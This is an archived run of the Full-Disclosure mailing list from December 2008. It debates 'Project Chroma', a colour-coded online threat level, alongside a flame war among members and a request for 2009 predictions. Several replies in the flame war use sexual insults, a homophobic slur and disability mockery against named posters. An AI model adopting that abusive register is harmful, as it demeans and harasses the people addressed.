> > > -- > MC > Security Researcher > Lead, Project Chroma > http://sites.google.com/site/projectchromaproject/ > From ureleet at gmail.com Fri Dec 5 01:34:08 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 4 Dec 2008 20:34:08 -0500 Subject: [Full-disclosure] Fwd: Solving of problems In-Reply-To: <6158bb410812041733t12d9f78g5d9bae52573baa82@mail.gmail.com> References: <6158bb410811270847i6a3365a5nbc93b7d375042b47@mail.gmail.com> <6158bb410812041733t12d9f78g5d9bae52573baa82@mail.gmail.com> Message-ID: <6158bb410812041734g13731b1cx719e2879abaa1b94@mail.gmail.com> ---------- Forwarded message ---------- From: Ureleet Date: Thu, Dec 4, 2008 at 8:34 PM Subject: Re: Solving of problems To: Mike C Cc: n3td3v who says we have it in for each other at all? what makes u the official 'problem' solver. i am the Yin to n3td3v's yang, u r just fucking up the rotation. On Wed, Dec 3, 2008 at 9:48 PM, Mike C wrote: > Ok. Lets restart. Why has the bickering restarted? > > Why do you have it in for each other? > > -- > MC > Security Researcher > Lead, Project Chroma > http://sites.google.com/site/projectchromaproject/ > From ureleet at gmail.com Fri Dec 5 01:29:57 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 4 Dec 2008 20:29:57 -0500 Subject: [Full-disclosure] News for Ureleet In-Reply-To: References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com> Message-ID: <6158bb410812041729p4e242201j9959c3df72c43061@mail.gmail.com> "we" implying, u, me, and n3td3v. 1st of all, u didnt do shit but send 2 emails. the talks between me n n3td3v have always been an open line of communication, ur just some "douche" who is obvouisly trying to take credit 4 stuff. moderate the n3td3v/ureleet discussion? yes, that was mike c, the cockswallower. o, and hes the lead of project chroma. even n3td3v said ur project is fucking pointless. go rot u cocksucker. 
u obviously have no contribution 2 life other than breathing my air. choke on a cock. On Wed, Dec 3, 2008 at 9:47 PM, Mike C wrote: > Hye Guys, > > I though we had settled the issues offline. Lets restart our > discussions.. this bickering is highly unnecessary on the list. > > -- > MC > Security Researcher > Lead, Project Chroma > http://sites.google.com/site/projectchromaproject/ > From ghosts at gmail.com Fri Dec 5 01:38:48 2008 From: ghosts at gmail.com (ghost) Date: Thu, 4 Dec 2008 20:38:48 -0500 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <6158bb410812041731l3aced389ra38603f0d118870@mail.gmail.com> References: <20081202192922.62A6C118041@smtp.hushmail.com> <6158bb410812041731l3aced389ra38603f0d118870@mail.gmail.com> Message-ID: <6f4bb0b50812041738yec1d227n1b3d355761b50020@mail.gmail.com> A colour scheme will save the world huh? So theyll be more dangerous when its red? Wont it always be red? why not just cut out the color scheme and emboss "THE INTERNET IS DANGEROUS, SERIOUS BUSINESS!" on every monitor. It will do the exact same thing your suggesting. without taking up my screen space. > On Wed, Dec 3, 2008 at 9:45 PM, Mike C wrote: >> On Tue, Dec 2, 2008 at 11:29 AM, Elazar Broad wrote: >>> -----BEGIN PGP SIGNED MESSAGE----- >>> Hash: SHA1 >>> >>> >>> >>> On Tue, 02 Dec 2008 11:50:46 -0500 rholgstad >>> wrote: >>>>Mike C wrote: >>>>> On Mon, Dec 1, 2008 at 5:27 PM, rholgstad >>>>wrote: >>>>> >>>>>> and how does making a color based on these inputs protect >>>>people? >>>>>> >>>>>> >>>>> >>>>> Once all desktops have an icon or widget (say at the right hand >>>>> corner) with the color, and this is consistently seen >>>>everywhere, the >>>>> users will start associating with their online security. they >>>>will be >>>>> reminded that they have to be careful with the data they share. 
>>>>> >>>>> This, if implemented correctly will be a boon to security >>>>industry, >>>>> where the weakest kinks currently are 'n00b' users. >>>>> >>>>> >>>>you are joking right? >>>> >>>>So some widget is going to stop the next SMB remote or IE client >>>>side >>>>and protect the 'n00b' users? Please explain how this works. Also >>>>please >>>>explain how "they will be reminded that they have to be careful >>>>with the >>>>data they share. " has anything to do with protecting a users >>>>machine >>>>from being compromised. >>> >>> Thats the whole point. There is a fine line between using visual >>> alerts to put people(Joe six pack) into a state of "awareness"(more >>> like mild hysteria) of a threat versus knowing how to protect >>> oneself against that threat and using that awareness indicator as >>> the kick in the ass to get moving and shore up the defenses(hell, >>> how many security folk do this too, then again, every time >>> something goes bump we see red). Visual alerts are great at >>> persuasion tools, especially when the goal is to get Joe to buy >>> your latest all-in-one-will-make-your-coffee-and-buy-you-beer >>> AV/Malware/Spyware/Foo(whats this doing here?)/evil monkey in the >>> closet package. So of course, Joe will never learn how to properly >>> defend his computer/data, and the "industry" will prosper. >>> >> >> I dont think it is a lost battle. This method could prove an excellent >> way to solve this age old problem. >> >>> Now, thanks to our good friends over at the DHS, the color system >>> has turned into a complete and utter joke(for the most part), so my >>> friend, you see, this a complete exercise in futility(besides the >>> fact that every friggin AV/IDS/Security/SIM company out there has >>> red, yellow and green as their corporate "flag", if you are just >>> joining the party, then you can completely ignore this) >>> >> DHS implementation leaves a lot to be desired. Please do not compare >> this to DHS's implementation. 
>> >>> If you really want to change state of security for the n00bs, >>> spread the knowledge, not the colors. >>> >> Thats what project Chroma is all about.. Are you on board?! >> >> -- >> MC >> Security Researcher >> Lead, Project Chroma >> http://sites.google.com/site/projectchromaproject/ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ghosts at gmail.com Fri Dec 5 01:53:35 2008 From: ghosts at gmail.com (ghost) Date: Thu, 4 Dec 2008 20:53:35 -0500 Subject: [Full-disclosure] Fwd: Solving of problems In-Reply-To: <6158bb410812041734g13731b1cx719e2879abaa1b94@mail.gmail.com> References: <6158bb410811270847i6a3365a5nbc93b7d375042b47@mail.gmail.com> <6158bb410812041733t12d9f78g5d9bae52573baa82@mail.gmail.com> <6158bb410812041734g13731b1cx719e2879abaa1b94@mail.gmail.com> Message-ID: <6f4bb0b50812041753i7d9af76bh201b8b058db8c239@mail.gmail.com> FWD FUD FTW On Thu, Dec 4, 2008 at 8:34 PM, Ureleet wrote: > ---------- Forwarded message ---------- > From: Ureleet > Date: Thu, Dec 4, 2008 at 8:34 PM > Subject: Re: Solving of problems > To: Mike C > Cc: n3td3v > > > who says we have it in for each other at all? what makes u the > official 'problem' solver. i am the Yin to n3td3v's yang, u r just > fucking up the rotation. > > On Wed, Dec 3, 2008 at 9:48 PM, Mike C wrote: >> Ok. Lets restart. Why has the bickering restarted? >> >> Why do you have it in for each other? >> >> -- >> MC >> Security Researcher >> Lead, Project Chroma >> http://sites.google.com/site/projectchromaproject/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. 

From vulcanius at gmail.com Fri Dec 5 02:14:48 2008
From: vulcanius at gmail.com (vulcanius)
Date: Thu, 4 Dec 2008 21:14:48 -0500
Subject: [Full-disclosure] Fwd: Solving of problems
In-Reply-To: <6158bb410812041734g13731b1cx719e2879abaa1b94@mail.gmail.com>
References: <6158bb410811270847i6a3365a5nbc93b7d375042b47@mail.gmail.com>
    <6158bb410812041733t12d9f78g5d9bae52573baa82@mail.gmail.com>
    <6158bb410812041734g13731b1cx719e2879abaa1b94@mail.gmail.com>
Message-ID:

Yin is the dark and yang is the light. Are you saying that you're the evil one Ureleet and... *gulp* ...n3td3v is the good?

On Thu, Dec 4, 2008 at 8:34 PM, Ureleet wrote:

> ---------- Forwarded message ----------
> From: Ureleet
> Date: Thu, Dec 4, 2008 at 8:34 PM
> Subject: Re: Solving of problems
> To: Mike C
> Cc: n3td3v
>
>
> who says we have it in for each other at all? what makes u the
> official 'problem' solver. i am the Yin to n3td3v's yang, u r just
> fucking up the rotation.
>
> On Wed, Dec 3, 2008 at 9:48 PM, Mike C wrote:
> > Ok. Lets restart. Why has the bickering restarted?
> >
> > Why do you have it in for each other?
> >
> > --
> > MC
> > Security Researcher
> > Lead, Project Chroma
> > http://sites.google.com/site/projectchromaproject/
> >
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081204/9c157a57/attachment.html

From punk3rx at hotmail.com Fri Dec 5 02:46:10 2008
From: punk3rx at hotmail.com (j w)
Date: Thu, 4 Dec 2008 20:46:10 -0600
Subject: [Full-disclosure] Fwd: Solving of problems
In-Reply-To:
References: <6158bb410811270847i6a3365a5nbc93b7d375042b47@mail.gmail.com>
    <6158bb410812041733t12d9f78g5d9bae52573baa82@mail.gmail.com>
    <6158bb410812041734g13731b1cx719e2879abaa1b94@mail.gmail.com>
Message-ID:

I'm an official problem solver, what the problem is?

Date: Thu, 4 Dec 2008 21:14:48 -0500
From: vulcanius at gmail.com
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Fwd: Solving of problems

Yin is the dark and yang is the light. Are you saying that you're the evil one Ureleet and... *gulp* ...n3td3v is the good?

On Thu, Dec 4, 2008 at 8:34 PM, Ureleet wrote:

---------- Forwarded message ----------
From: Ureleet
Date: Thu, Dec 4, 2008 at 8:34 PM
Subject: Re: Solving of problems
To: Mike C
Cc: n3td3v

who says we have it in for each other at all? what makes u the official 'problem' solver. i am the Yin to n3td3v's yang, u r just fucking up the rotation.

On Wed, Dec 3, 2008 at 9:48 PM, Mike C wrote:
> Ok. Lets restart. Why has the bickering restarted?
>
> Why do you have it in for each other?
>
> --
> MC
> Security Researcher
> Lead, Project Chroma
> http://sites.google.com/site/projectchromaproject/
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081204/ed81e2f6/attachment.html

From vpn.1.fanatic at gmail.com Fri Dec 5 02:53:33 2008
From: vpn.1.fanatic at gmail.com (Jubei Trippataka)
Date: Fri, 5 Dec 2008 13:53:33 +1100
Subject: [Full-disclosure] News for Ureleet
In-Reply-To: <6f4bb0b50812041649lb0d57a3le14927b232d22ae8@mail.gmail.com>
References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com>
    <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com>
    <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com>
    <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com>
    <1228431557.23932.4.camel@roswell.ausics.net>
    <6f4bb0b50812041649lb0d57a3le14927b232d22ae8@mail.gmail.com>
Message-ID: <1c27cb9a0812041853l2439d3d1g825ebe729de61b40@mail.gmail.com>

On Fri, Dec 5, 2008 at 11:49 AM, ghost wrote:

> a wanka mate? well i be a fag from down unda, cheers & jolly ho ol
> chap. This is the only contribution youve made to full-disclosure. So
> whos the useless wanka then? go on back to your bread pudding before i
> take a piss on ya and give you a good rodging.
>

Wrong country, that's all British slang you extra chromosomal piss-freak.

--
ciao

JT
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081205/59f38572/attachment.html

From nb at ausics.net Fri Dec 5 03:03:45 2008
From: nb at ausics.net (Noel Butler)
Date: Fri, 05 Dec 2008 13:03:45 +1000
Subject: [Full-disclosure] News for Ureleet
In-Reply-To: <6f4bb0b50812041649lb0d57a3le14927b232d22ae8@mail.gmail.com>
References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com>
    <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com>
    <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com>
    <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com>
    <1228431557.23932.4.camel@roswell.ausics.net>
    <6f4bb0b50812041649lb0d57a3le14927b232d22ae8@mail.gmail.com>
Message-ID: <1228446224.25831.2.camel@roswell.ausics.net>

On Fri, 2008-12-05 at 10:49, ghost wrote:

> a wanka mate? well i be a fag from down unda, cheers & jolly ho ol
> chap. This is the only contribution youve made to full-disclosure. So
> whos the useless wanka then? go on back to your bread pudding before i
> take a piss on ya and give you a good rodging.
>

no one takes this list seriously anymore thanks to the noisy deadbeats, there is .000000000000000000000000000000000000000000000000001% signal, with the remaining pure noise, and whos got the bigger cock, or who can piss further, no one actually gives a rats ass.

> On Thu, Dec 4, 2008 at 5:59 PM, Noel Butler wrote:
> > really, interesting.. how can they contribute to anyone else's benefit,
> > since they are both fucking cockheads and are in almost everyones shitlist
> > filters, infact how do we not know ghost, you are not another one of this
> > delusional fuckheads aliases, you'd have to be, to be even making out like
> > you even read anything those wankas post.
> >
> >
> >
> > On Thu, 2008-12-04 at 13:23, ghost wrote:
> >
> > Hey mike, how about you stop playing moderator you fucking douche bag.
> > I for one believe netdev brings alot to this list and encourage him
> > and ureleet to continue posting.
> >
> > On Wed, Dec 3, 2008 at 9:47 PM, Mike C wrote:
> >> Hey Guys,
> >>
> >> I thought we had settled the issues offline. Lets restart our
> >> discussions.. this bickering is highly unnecessary on the list.
> >>
> >> --
> >> MC
> >> Security Researcher
> >> Lead, Project Chroma
> >> http://sites.google.com/site/projectchromaproject/
> >>
> >
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081205/edea961c/attachment.html

From xploitable at gmail.com Fri Dec 5 03:36:04 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 5 Dec 2008 03:36:04 +0000
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <20081202192922.62A6C118041@smtp.hushmail.com>
    <49375527.3070804@clusterbee.net>
Message-ID: <4b6ee9310812041936p26b4900dl122ecd453f2477fa@mail.gmail.com>

On Thu, Dec 4, 2008 at 3:03 PM, Chris Jeane wrote:
> The Project Chroma Project website reads(I have highlighted the colors in
> black so that they are readable):
>
> Green level: There is negligible threat to online security.
> Ok this one is pretty simple.
>
> Yellow level : There is a minimal level of threat, and this must be
> monitored and contained.
> The SAN ISC says : "We are currently tracking a significant new threat. The
> impact is either unknown or expected to be minor to the infrastructure.
> However, local impact could be significant. Users are advised to take
> immediate specific action to contain the impact."
> You are giving an abbreviation version of something that already exists and
> is accepted.
>
> Orange level: This level of threat indicates there are parties who are
> actively engaging in cyber-warfare. Caution is required when online.
> Caution is always required when online. If you are in an area
> (country/province/region) that is affected by cyber attacks you will have
> limited/no access to the internet. If only your company/person is being
> assaulted from cyberspace the attack would probably go unnoticed by this
> monitoring system. If the attackers were committing a DDOS attack on several
> specific non-infrastructure targets, your internet access may slow/go dark, but
> is that really a threat to you? or one you can protect against?
>
> Red level: This level indicates a full blown cyber-war. It indicates
> very high probability of all communications being intercepted.
> The use of the term 'full blown cyber-war' seems like an overarching scare
> tactic. We have yet to see what cyber-warfare looks like. Estonia was a one
> sided cyber ambush, not two entities engaging in war. The alerts should be
> more generic and accompanied by an assessment of the actual current
> situation. If something like 'Code Red' were to infect the internet again
> this alert calling it cyber-war would be a misnomer.
>
> While homeland security's implementation does not seem to have a real
> world merit, such a threat level would certainly be very useful in the
> online security realm.
> Who is this useful to: Security professionals, end users, governmental
> agencies? How and why as similar systems already exist?
>
> Please disseminate this announcement of the
> project Chroma levels for online security. The immediate mission of
> the project is to be picked up by the antivirus and security tools
> vendors, so as to add the color codes to their products and provide
> users with a tangible measure of their online security.
> Yellow is not a tangible measure of their online security.
> If perhaps an
> Online Security/IPS package knew that a DDoS attack was coming for an
> address segment of the internet and it requested that I block traffic from
> those attackers until an all clear or Green
> status was given. That is tangible and actionable.
>
> Current status: Threat level Yellow.
> Your current is higher than SANS ISC. Do you know something they don't?
>

Symantec / Securityfocus is currently Yellow as well.

Maybe its SANS that are out of the loop afterall.

From Valdis.Kletnieks at vt.edu Fri Dec 5 03:39:13 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Thu, 04 Dec 2008 22:39:13 -0500
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: Your message of "Fri, 05 Dec 2008 03:36:04 GMT."
    <4b6ee9310812041936p26b4900dl122ecd453f2477fa@mail.gmail.com>
References: <20081202192922.62A6C118041@smtp.hushmail.com>
    <49375527.3070804@clusterbee.net>
    <4b6ee9310812041936p26b4900dl122ecd453f2477fa@mail.gmail.com>
Message-ID: <95390.1228448353@turing-police.cc.vt.edu>

On Fri, 05 Dec 2008 03:36:04 GMT, n3td3v said:

> Symantec / Securityfocus is currently Yellow as well.
>
> Maybe its SANS that are out of the loop afterall.

What color has the most beneficial effect on the stock prices of each of the 3 companies?
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081204/450e6e31/attachment.bin

From xploitable at gmail.com Fri Dec 5 03:48:49 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 5 Dec 2008 03:48:49 +0000
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: <95390.1228448353@turing-police.cc.vt.edu>
References: <20081202192922.62A6C118041@smtp.hushmail.com>
    <49375527.3070804@clusterbee.net>
    <4b6ee9310812041936p26b4900dl122ecd453f2477fa@mail.gmail.com>
    <95390.1228448353@turing-police.cc.vt.edu>
Message-ID: <4b6ee9310812041948m171af1fnd0fdfea0eb67a474@mail.gmail.com>

On Fri, Dec 5, 2008 at 3:39 AM, wrote:
> On Fri, 05 Dec 2008 03:36:04 GMT, n3td3v said:
>
>> Symantec / Securityfocus is currently Yellow as well.
>>
>> Maybe its SANS that are out of the loop afterall.
>
> What color has the most beneficial effect on the stock prices of each of the 3
> companies?
>

This is a cyber security list not Yahoo Finance, how am I supposed to answer that question? And why would you expect anyone to be able to answer that on this list? A sweeping guess would be red for danger, meaning everyone should buy Symantec products and that people should sign up for doofus SANS courses?

Enlighten me Valdis, because i've got a sneaky suspicion you've already got the answer lined up.

From Valdis.Kletnieks at vt.edu Fri Dec 5 03:59:13 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Thu, 04 Dec 2008 22:59:13 -0500
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: Your message of "Fri, 05 Dec 2008 03:48:49 GMT."
    <4b6ee9310812041948m171af1fnd0fdfea0eb67a474@mail.gmail.com>
References: <20081202192922.62A6C118041@smtp.hushmail.com>
    <49375527.3070804@clusterbee.net>
    <4b6ee9310812041936p26b4900dl122ecd453f2477fa@mail.gmail.com>
    <95390.1228448353@turing-police.cc.vt.edu>
    <4b6ee9310812041948m171af1fnd0fdfea0eb67a474@mail.gmail.com>
Message-ID: <96210.1228449553@turing-police.cc.vt.edu>

On Fri, 05 Dec 2008 03:48:49 GMT, you said:

> answer that on this list? A sweeping guess would be red for danger,

No, if you sell security products, you *dont* want it to be red, because that gives the impression that your already-deployed sales aren't doing a good enough job of stopping the badness.

"It's RED, buy our product."
"Why? If your product actually *worked*, why should it be RED?"
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081204/8037a338/attachment.bin

From xploitable at gmail.com Fri Dec 5 04:10:44 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 5 Dec 2008 04:10:44 +0000
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: <96210.1228449553@turing-police.cc.vt.edu>
References: <20081202192922.62A6C118041@smtp.hushmail.com>
    <49375527.3070804@clusterbee.net>
    <4b6ee9310812041936p26b4900dl122ecd453f2477fa@mail.gmail.com>
    <95390.1228448353@turing-police.cc.vt.edu>
    <4b6ee9310812041948m171af1fnd0fdfea0eb67a474@mail.gmail.com>
    <96210.1228449553@turing-police.cc.vt.edu>
Message-ID: <4b6ee9310812042010m35a391fak53842b88817d4b2@mail.gmail.com>

On Fri, Dec 5, 2008 at 3:59 AM, wrote:
> On Fri, 05 Dec 2008 03:48:49 GMT, you said:
>
>> answer that on this list?
>> A sweeping guess would be red for danger,
>
> No, if you sell security products, you *dont* want it to be red, because
> that gives the impression that your already-deployed sales aren't doing
> a good enough job of stopping the badness.
>
> "It's RED, buy our product."
> "Why? If your product actually *worked*, why should it be RED?"
>

I'm coming to the conclusion that most folks benefit from it being at a moderate level, between green and amber. They can flick it between the two and not get into too much trouble, while keeping observers stimulated with interest?

From Valdis.Kletnieks at vt.edu Fri Dec 5 03:36:40 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Thu, 04 Dec 2008 22:36:40 -0500
Subject: [Full-disclosure] News for Ureleet
In-Reply-To: Your message of "Fri, 05 Dec 2008 13:03:45 +1000."
    <1228446224.25831.2.camel@roswell.ausics.net>
References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com>
    <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com>
    <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com>
    <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com>
    <1228431557.23932.4.camel@roswell.ausics.net>
    <6f4bb0b50812041649lb0d57a3le14927b232d22ae8@mail.gmail.com>
    <1228446224.25831.2.camel@roswell.ausics.net>
Message-ID: <95233.1228448200@turing-police.cc.vt.edu>

On Fri, 05 Dec 2008 13:03:45 +1000, Noel Butler said:

> with the remaining pure noise, and whos got the bigger cock, or who can
> piss further, no one actually gives a rats ass.

Never get into either a pissing or wang-size contest with an elephant. ;)
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081204/18b321ae/attachment.bin

From ureleet at gmail.com Fri Dec 5 13:30:52 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 5 Dec 2008 08:30:52 -0500
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: <95390.1228448353@turing-police.cc.vt.edu>
References: <20081202192922.62A6C118041@smtp.hushmail.com>
    <49375527.3070804@clusterbee.net>
    <4b6ee9310812041936p26b4900dl122ecd453f2477fa@mail.gmail.com>
    <95390.1228448353@turing-police.cc.vt.edu>
Message-ID: <6158bb410812050530r4184a5f6nf6da32c7748aa519@mail.gmail.com>

good point valdis. the internet storm center doesnt have a stock price, does that mean they can be more objective? ive noticed they dont raise theirs unless there _really_ is an issue.

On Thu, Dec 4, 2008 at 10:39 PM, wrote:
> On Fri, 05 Dec 2008 03:36:04 GMT, n3td3v said:
>
>> Symantec / Securityfocus is currently Yellow as well.
>>
>> Maybe its SANS that are out of the loop afterall.
>
> What color has the most beneficial effect on the stock prices of each of the 3
> companies?
>

From ureleet at gmail.com Fri Dec 5 13:32:44 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 5 Dec 2008 08:32:44 -0500
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: <4b6ee9310812042010m35a391fak53842b88817d4b2@mail.gmail.com>
References: <20081202192922.62A6C118041@smtp.hushmail.com>
    <49375527.3070804@clusterbee.net>
    <4b6ee9310812041936p26b4900dl122ecd453f2477fa@mail.gmail.com>
    <95390.1228448353@turing-police.cc.vt.edu>
    <4b6ee9310812041948m171af1fnd0fdfea0eb67a474@mail.gmail.com>
    <96210.1228449553@turing-police.cc.vt.edu>
    <4b6ee9310812042010m35a391fak53842b88817d4b2@mail.gmail.com>
Message-ID: <6158bb410812050532l5aaa026dofd91f6906cd351f6@mail.gmail.com>

i think that color rating is pretty much retarded w/out sumthing 2 back it up. if there is a reason to raise it, then fine, but keeping the color at 2 (iss) or yellow (symantec) all the time doesnt do anything. its like the homeland security colors in teh united states. if its at yellow all the time, yellow becomes teh new green.

On Thu, Dec 4, 2008 at 11:10 PM, n3td3v wrote:
> On Fri, Dec 5, 2008 at 3:59 AM, wrote:
>> On Fri, 05 Dec 2008 03:48:49 GMT, you said:
>>
>>> answer that on this list? A sweeping guess would be red for danger,
>>
>> No, if you sell security products, you *dont* want it to be red, because
>> that gives the impression that your already-deployed sales aren't doing
>> a good enough job of stopping the badness.
>>
>> "It's RED, buy our product."
>> "Why? If your product actually *worked*, why should it be RED?"
>>
>
> I'm coming to the conclusion that most folks benefit from it being at
> a moderate level, between green and amber. They can flick it between
> the two and not get into too much trouble, while keeping observers
> stimulated with interest?
>

From ureleet at gmail.com Fri Dec 5 13:34:05 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 5 Dec 2008 08:34:05 -0500
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: <4b6ee9310812041936p26b4900dl122ecd453f2477fa@mail.gmail.com>
References: <20081202192922.62A6C118041@smtp.hushmail.com>
    <49375527.3070804@clusterbee.net>
    <4b6ee9310812041936p26b4900dl122ecd453f2477fa@mail.gmail.com>
Message-ID: <6158bb410812050534l180f06dcs3b323041c4aab45@mail.gmail.com>

well, sans has said in the past they dont raise their color unless there is an immediate threat i think. i think chris, in this thread be4 said the differences pretty well.

On Thu, Dec 4, 2008 at 10:36 PM, n3td3v wrote:
> On Thu, Dec 4, 2008 at 3:03 PM, Chris Jeane wrote:
>> The Project Chroma Project website reads(I have highlighted the colors in
>> black so that they are readable):
>>
>> Green level: There is negligible threat to online security.
>> Ok this one is pretty simple.
>>
>> Yellow level : There is a minimal level of threat, and this must be
>> monitored and contained.
>> The SAN ISC says : "We are currently tracking a significant new threat. The
>> impact is either unknown or expected to be minor to the infrastructure.
>> However, local impact could be significant. Users are advised to take
>> immediate specific action to contain the impact."
>> You are giving an abbreviation version of something that already exists and
>> is accepted.
>>
>> Orange level: This level of threat indicates there are parties who are
>> actively engaging in cyber-warfare. Caution is required when online.
>> Caution is always required when online.
>> If you are in an area
>> (country/province/region) that is affected by cyber attacks you will have
>> limited/no access to the internet. If only your company/person is being
>> assaulted from cyberspace the attack would probably go unnoticed by this
>> monitoring system. If the attackers were committing a DDOS attack on several
>> specific non-infrastructure targets, your internet access may slow/go dark, but
>> is that really a threat to you? or one you can protect against?
>>
>> Red level: This level indicates a full blown cyber-war. It indicates
>> very high probability of all communications being intercepted.
>> The use of the term 'full blown cyber-war' seems like an overarching scare
>> tactic. We have yet to see what cyber-warfare looks like. Estonia was a one
>> sided cyber ambush, not two entities engaging in war. The alerts should be
>> more generic and accompanied by an assessment of the actual current
>> situation. If something like 'Code Red' were to infect the internet again
>> this alert calling it cyber-war would be a misnomer.
>>
>> While homeland security's implementation does not seem to have a real
>> world merit, such a threat level would certainly be very useful in the
>> online security realm.
>> Who is this useful to: Security professionals, end users, governmental
>> agencies? How and why as similar systems already exist?
>>
>> Please disseminate this announcement of the
>> project Chroma levels for online security. The immediate mission of
>> the project is to be picked up by the antivirus and security tools
>> vendors, so as to add the color codes to their products and provide
>> users with a tangible measure of their online security.
>> Yellow is not a tangible measure of their online security. If perhaps an
>> Online Security/IPS package knew that a DDoS attack was coming for an
>> address segment of the internet and it requested that I block traffic from
>> those attackers until an all clear or Green
>> status was given.
>> That is tangible and actionable.
>>
>> Current status: Threat level Yellow.
>> Your current is higher than SANS ISC. Do you know something they don't?
>>
>
> Symantec / Securityfocus is currently Yellow as well.
>
> Maybe its SANS that are out of the loop afterall.
>

From ureleet at gmail.com Fri Dec 5 13:36:14 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 5 Dec 2008 08:36:14 -0500
Subject: [Full-disclosure] Fwd: Solving of problems
In-Reply-To:
References: <6158bb410811270847i6a3365a5nbc93b7d375042b47@mail.gmail.com>
    <6158bb410812041733t12d9f78g5d9bae52573baa82@mail.gmail.com>
    <6158bb410812041734g13731b1cx719e2879abaa1b94@mail.gmail.com>
Message-ID: <6158bb410812050536k48fa08d8x82d6bcabd55eeaa2@mail.gmail.com>

well, i just meant that there is a positive and a negative. each keeping each other in check. mike c needs to go choke on a dick.

On Thu, Dec 4, 2008 at 9:14 PM, vulcanius wrote:
> Yin is the dark and yang is the light. Are you saying that you're the evil
> one Ureleet and... *gulp* ...n3td3v is the good?
>
> On Thu, Dec 4, 2008 at 8:34 PM, Ureleet wrote:
>>
>> ---------- Forwarded message ----------
>> From: Ureleet
>> Date: Thu, Dec 4, 2008 at 8:34 PM
>> Subject: Re: Solving of problems
>> To: Mike C
>> Cc: n3td3v
>>
>>
>> who says we have it in for each other at all? what makes u the
>> official 'problem' solver. i am the Yin to n3td3v's yang, u r just
>> fucking up the rotation.
>>
>> On Wed, Dec 3, 2008 at 9:48 PM, Mike C wrote:
>> > Ok. Lets restart. Why has the bickering restarted?
>> >
>> > Why do you have it in for each other?
>> >
>> > --
>> > MC
>> > Security Researcher
>> > Lead, Project Chroma
>> > http://sites.google.com/site/projectchromaproject/
>> >
>>
>

From xploitable at gmail.com Fri Dec 5 17:24:59 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 5 Dec 2008 17:24:59 +0000
Subject: [Full-disclosure] Security predictions for 2009
Message-ID: <4b6ee9310812050924q499f7cbeo8fd39167389ca7e2@mail.gmail.com>

We here at n3td3v would like to hear your security predictions for 2009.

Last time Paul Ferguson said 2008 would be the year of web 2.0 bugs and web 2.0 worms, that turned out to be utter rubbish (He does work for Trend Micro afterall), but in true tradition, let's hear some of your predictions that might turn out to be bullshit as well.

n3td3v

From ian.wolff at yahoo.com Fri Dec 5 17:34:15 2008
From: ian.wolff at yahoo.com (Ian Wolff)
Date: Fri, 5 Dec 2008 09:34:15 -0800 (PST)
Subject: [Full-disclosure] Fwd: Solving of problems
